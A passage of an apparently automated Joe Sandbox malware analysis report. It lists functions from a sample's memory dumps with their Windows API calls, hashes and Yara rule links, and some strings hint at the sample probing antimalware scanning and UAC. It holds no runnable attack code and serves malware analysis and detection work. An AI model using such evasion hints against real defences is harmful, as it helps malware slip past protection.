                                                                                                                                                                                    • Instruction Fuzzy Hash: 87113DB5624304EFDB01FF69DC91A9D7BECEB0A610F5044A1B418DB651D674EE808B60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 03247B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B61
                                                                                                                                                                                      • Part of subcall function 03247B20: GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B67
                                                                                                                                                                                      • Part of subcall function 03247B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B81
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2543409266-0
                                                                                                                                                                                    • Opcode ID: c01ca4b07684f6cb85f16ca3e2b6f124f2f08f25b8f7da295d7f7b9986702add
                                                                                                                                                                                    • Instruction ID: 43ce3a413df9439f7ea2c668f129d2228c262e6b1142a8cbee55c89d8c8006f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: c01ca4b07684f6cb85f16ca3e2b6f124f2f08f25b8f7da295d7f7b9986702add
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C019BF4724348BFDB05FB79DC51A1E77A8EB4B200F6044A1A62CAB641DBB49D818758
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323E320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                    • Opcode ID: feac162d7b64e85232c792dcf8bb7e3449b6992f4ac354987af88068dbdb10bf
                                                                                                                                                                                    • Instruction ID: 8da183712a4c9fc2bcc6cd51c33138e2be3804481e2c09170593cdc747027b12
                                                                                                                                                                                    • Opcode Fuzzy Hash: feac162d7b64e85232c792dcf8bb7e3449b6992f4ac354987af88068dbdb10bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECF0AFEA73432486C710FB38C884ABD2BA86F43610B526462B8466F255CBB4CCCD8263
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CB3549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 15CB3569
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 15CB3587
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 15CB3592
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: 44262fcd7f448ff859754e80c0e517044ed9271f4d2fb632ff957c6182dee858
                                                                                                                                                                                    • Instruction ID: 1baa5e6c53049413ffef960daf166e75ae0798856cea670fe06ffd6ec18ab702
                                                                                                                                                                                    • Opcode Fuzzy Hash: 44262fcd7f448ff859754e80c0e517044ed9271f4d2fb632ff957c6182dee858
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0F476900218BFDF109EE09C45FEABBBCEB48B51F1040A6FE04E6140E7715B18EB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03234D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 03234D1F
                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 03234D31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                    • Opcode ID: 06eb4b82b220cc35c730d2b6db0b9b770e20ccfd713d8275290070e02d828af2
                                                                                                                                                                                    • Instruction ID: 8311f8dabb14e301d8536e9e371b350317c44f3ced2b000c4fb725bb2405e2de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06eb4b82b220cc35c730d2b6db0b9b770e20ccfd713d8275290070e02d828af2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E012FC2393065EEF14BF218C40B3BB369AFC3641B5848D8A800CE150DBB8D8D16638
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 03247396
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                                                    • Opcode ID: da383631bfd04538d5e8263b7d464a9ce90cf1beb1a3b4a98a3183f7f15e3f92
                                                                                                                                                                                    • Instruction ID: e08893aacc38b7daeb3a5e615d80e7f951847ad53c172e47846d946ac3b85d37
                                                                                                                                                                                    • Opcode Fuzzy Hash: da383631bfd04538d5e8263b7d464a9ce90cf1beb1a3b4a98a3183f7f15e3f92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B1E474A11609DFDB14CF98D480A9DBBF6FF4A314F248569E825AB360D770AC85CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE8BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,15CDCE55), ref: 15CE8C24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                    • Opcode ID: 4428d5052e0b3ca886912cdc6fac2efb994337ead9232c9a6b275e0baae41177
                                                                                                                                                                                    • Instruction ID: ff3c4f04deffa60cc089d2e82026b298c09321950334457085100a1cf7cb5ef5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4428d5052e0b3ca886912cdc6fac2efb994337ead9232c9a6b275e0baae41177
                                                                                                                                                                                    • Instruction Fuzzy Hash: D801E23650121AFBCF029F94DD41DEEBF66FF08790F018955FE1966160CB32A931AB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE84CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,15CE8839,00000006,FlsSetValue,15CFF160,15CFF168,00000000,00000364,?,15CE82E7,00000000), ref: 15CE852A
                                                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 15CE8537
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2279764990-0
                                                                                                                                                                                    • Opcode ID: 4f99f55f6afb5d8d2003649d16536e78b0120e6055ace1cddd7287cf7176305f
                                                                                                                                                                                    • Instruction ID: 0b78f8ec7a45f9fbb01a9280c6ec145ba5bfcc178495889288f406e58c85696f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f99f55f6afb5d8d2003649d16536e78b0120e6055ace1cddd7287cf7176305f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5711E737A026728FEB12CE6DD8A099B7B95FB806607024961ED15AB244DF30EC0387D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323E71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 0323E73D
                                                                                                                                                                                      • Part of subcall function 0323E320: VariantClear.OLEAUT32(?), ref: 0323E32F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                                    • Opcode ID: 6722efd04d85a87a22b9f1d53f6116d61f8042900298bfbabb9701915fd590a9
                                                                                                                                                                                    • Instruction ID: 0801d2e24ef8a3e178eeddced61da0d35ee08439900568e3b1439f9984a1dbaf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6722efd04d85a87a22b9f1d53f6116d61f8042900298bfbabb9701915fd590a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD11E5EA73071087E720EB29C8C496677EDEF87B107168466F44A8F255DAB0CCC8C6A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323E3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                                                    • Opcode ID: e1009f2a6f90a9cf72401cd099c075127dbd297173d47b762196734b52f49c39
                                                                                                                                                                                    • Instruction ID: 6f8d7f31f64da38102cc6ed5584ee8cdf345d4e13677daf75e29d56767acfe56
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1009f2a6f90a9cf72401cd099c075127dbd297173d47b762196734b52f49c39
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC3152B7A242099FDB10DF98D884AAEB7F8EB0E210F454561FA05D7240D375E9D8C761
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03246D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000), ref: 03246D55
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                                                    • Opcode ID: 7871771c432744a8e280053be2d3cda3ca7f1085fb48e0697132a8779b51c8b9
                                                                                                                                                                                    • Instruction ID: 9d7bc0f19ae4e9edce6db9032eaee1c5fea188f9a463b4ba28690bc30e7302fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7871771c432744a8e280053be2d3cda3ca7f1085fb48e0697132a8779b51c8b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E065B5624708BFD705FA72DC5199D76ECDB4B610B6204B1A800A7500DAF55E40C565
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323584A
                                                                                                                                                                                      • Part of subcall function 03235A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03230000,0325B790), ref: 03235AAC
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 03235ACA
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235AE8
                                                                                                                                                                                      • Part of subcall function 03235A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235B06
                                                                                                                                                                                      • Part of subcall function 03235A90: RegQueryValueExA.ADVAPI32 ref: 03235B4F
                                                                                                                                                                                      • Part of subcall function 03235A90: RegQueryValueExA.ADVAPI32 ref: 03235B6D
                                                                                                                                                                                      • Part of subcall function 03235A90: RegCloseKey.ADVAPI32(?), ref: 03235B8F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                                    • Instruction ID: 9ae111db213d7dcda139031409c329648b230752713f5ee099cd0d56686cbb9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BE092B1A103198FCB10DE5CD8C0A9733D8AF0A754F0809A1ED98CF346D3B0D9A08BD0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03237D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03237DB0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                    • Instruction ID: 39965971b7b500541922b60ab0b52dd1dbe6ee772775581cf8dd8863fecf193c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8D05BF63192157AD220D55E6C84DB75BDCCBCA771F10067DB568C7180D7608C018671
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03237E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,03251133,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,ScanString), ref: 03237E47
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                                                                                    • Instruction ID: 78c5b608c4acc0939bacdb52fcfaae4e8c985402281f7a131c36df7246f9097e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90C08CE4A333060E9E50EAFC1CC02A9028C0947038B282BA1E038E61C1D259D8E32460
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03237E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                                    • Instruction ID: cca9bb896875b41ff57c798af94409af2fd54a572154870077f6a2eff48b1184
                                                                                                                                                                                    • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC08CE963730106AE50E2FC0CC401A428809470383281B79B038D62D1D269C8D324A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03234C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                    • Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                                                                                    • Instruction ID: eebeaf82cc39a4764a2b6ba23b3a0658c38ed630eeefb771d15926cf49493bea
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3C012E562423147EF21E65A9CC075562CC9B06295B1804E1D514DB240E6A09C408254
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03259B3C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,03259B30,00000000,00000001), ref: 03259B4C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Eventtime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2982266575-0
                                                                                                                                                                                    • Opcode ID: e9e54cce04246b5414ad0ab17aff9d451803812ab219c9c3ee1a1db08c50f541
                                                                                                                                                                                    • Instruction ID: 6ff6fd04871b05adde83ddafa4637c3350d7b0a517852206b215ae8a19e1b35c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9e54cce04246b5414ad0ab17aff9d451803812ab219c9c3ee1a1db08c50f541
